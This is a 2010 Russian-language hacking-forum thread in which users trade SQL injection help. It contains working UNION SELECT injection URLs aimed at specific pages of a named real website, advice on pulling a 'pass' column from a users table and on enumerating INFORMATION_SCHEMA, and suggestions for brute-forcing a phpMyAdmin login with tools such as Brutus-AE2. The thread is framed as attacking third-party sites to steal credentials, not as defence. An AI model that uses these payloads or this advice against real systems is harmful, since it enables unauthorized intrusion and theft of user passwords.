22.07.2010, 21:48
|
|
Участник форума
Регистрация: 11.07.2010
Сообщений: 147
С нами:
8335766
Репутация:
17
|
|
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
|
|
|
22.07.2010, 21:50
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от Yetisports
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5
=\
/showthread.php?p=2254732
|
|
|
|
22.07.2010, 21:51
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами:
8440113
Репутация:
3
|
|
Спасибо конечно.. про rand я знаю а вот для чего |0 непонял
|
|
|
|
22.07.2010, 22:05
|
|
Новичок
Регистрация: 25.06.2010
Сообщений: 17
С нами:
8358806
Репутация:
0
|
|
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
|
|
|
|
22.07.2010, 22:13
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от IMMORTAL_S
Спасибо конечно.. про rand я знаю
а вот для чего
|0
непонял
Это операция Побитового "ИЛИ".
Пример:
Код:
mysql> SELECT 29 | 15;
+---------+
| 29 | 15 |
+---------+
| 31 |
+---------+
1 row in set (0.00 sec)
mysql> SELECT 5|9;
+-----+
| 5|9 |
+-----+
| 13 |
+-----+
1 row in set (0.01 sec)
mysql> SELECT 2|96;
+------+
| 2|96 |
+------+
| 98 |
+------+
1 row in set (0.00 sec)
mysql> SELECT 7|5;
+-----+
| 7|5 |
+-----+
| 7 |
+-----+
1 row in set (0.00 sec)
Можешь сверить по калькулятору(кнопка OR).
|
|
|
|
22.07.2010, 22:28
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от bogdan
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
Возможно луна в другой фазе.
Код:
UNION SELECT ...DATABASE() FROM USERS
Код:
UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users'
Вполне вероятно, что базы разные.
|
|
|
|
22.07.2010, 22:51
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 7
С нами:
8800024
Репутация:
1
|
|
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
|
|
|
|
22.07.2010, 23:05
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Anexroid
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить.
2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.
|
|
|
|
22.07.2010, 23:06
|
|
Новичок
Регистрация: 22.08.2009
Сообщений: 7
С нами:
8800024
Репутация:
1
|
|
Да, нашел вход в phpmyadmin. Имя пользователя знаю.
Авторизация через .htaccess
Вопрос номер 2:
При помощи чего брутить?
|
|
|
|
22.07.2010, 23:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Anexroid
Да, нашел вход в phpmyadmin. Имя пользователя знаю.
Авторизация через .htaccess
Вопрос номер 2:
При помощи чего брутить?
Скриптами, прогами. Можно даже легендарной Brutus-AE2(так вроде называется), там брут форм есть и Basic Auth
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
